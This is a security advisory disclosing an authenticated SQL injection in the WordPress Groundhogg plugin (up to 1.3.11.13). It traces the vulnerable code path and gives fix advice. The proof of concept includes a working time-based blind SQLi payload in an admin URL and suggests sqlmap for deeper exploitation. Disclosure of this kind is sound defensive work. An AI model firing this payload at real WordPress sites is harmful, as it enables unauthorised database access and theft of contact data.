Wordpress Groundhogg <= 1.3.11.13 Authenticated SQL Injection
The WordPress Groundhogg plugin, version 1.3.11.13 and earlier, is affected by an authenticated SQL injection vulnerability: the contact export bulk job hands the raw query string to the plugin's contact query builder, which runs it through $wpdb->get_results() without sanitisation.
Initial submission of the vulnerability
# Exploit Title: Wordpress Groundhogg <= 1.3.11.13 Authenticated SQL Injection Vulnerability
# Date: 23-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://www.groundhogg.io/
# Software Link: https://wordpress.org/plugins/groundhogg/
# Version: 1.3.11.13
# Tested on: Ubuntu 18.04 / Wordpress 5.3
1. Description:
The WordPress Groundhogg plugin, version 1.3.11.13 and earlier, is affected by an authenticated SQL injection vulnerability.
2. Proof of Concept:
Authenticated SQL Injection:
- Using a WordPress user that holds the export_contacts capability (the vulnerable method checks current_user_can( 'export_contacts' ) before building the query), access <your target>/wp-admin/admin.php?page=gh_bulk_jobs&action=gh_export_contacts&optin_status%5B0%5D=(select*from(select(sleep(20)))a)&optin_status%5B1%5D=0
- The response is returned only after 20 seconds, which confirms that the injected SLEEP() was executed by the database (time-based blind injection).
- sqlmap can be used to further exploit the vulnerability; because the endpoint lives under /wp-admin/, the logged-in session cookie has to be supplied with every request.
Detailed analysis of the vulnerability
The query() method in /wp-content/plugins/groundhogg/includes/admin/tools/class-wpgh-export-bulk-job.php (lines 38-51) accepts arbitrary user-supplied data as follows:
public function query($items)
{
    // Only users holding the export_contacts capability reach the query.
    if ( ! current_user_can( 'export_contacts' ) ){
        return $items;
    }
    $query = new WPGH_Contact_Query();
    // The complete request query string is handed over without any filtering.
    $args = $_GET;
    $contacts = $query->query( $args );
    $ids = wp_list_pluck( $contacts, 'ID' );
    return $ids;
}
The line $contacts = $query->query( $args ); passes the whole $_GET array, unsanitised, into the following method from /wp-content/plugins/groundhogg/includes/class-wpgh-contact-query.php (lines 279-284):
public function query( $query ) {
    // wp_parse_args() only merges the array; no key whitelist, no value validation.
    $this->query_vars = wp_parse_args( $query );
    $items = $this->get_items();
    return $items;
}
Finally, the unsanitised query is executed in wp-content/plugins/groundhogg/includes/class-wpgh-contact-query.php at line 430 (WPGH_Contact_Query->query_items()):
$results = $wpdb->get_results( $this->request );
return $results;
How to fix
Update to the latest available version of the Groundhogg plugin.
Independently of the vendor's change, the root cause is the wholesale hand-off of $_GET to WPGH_Contact_Query: a correct fix only accepts the query variables the export actually needs, casts or escapes each of them (for instance with $wpdb->prepare()) before they reach the SQL string, and never relies on the export_contacts capability check alone, since that check limits who can reach the bug but does not remove it.
Public appearances
- tba
Other references
- tba
This post is licensed under CC BY 4.0 by the author.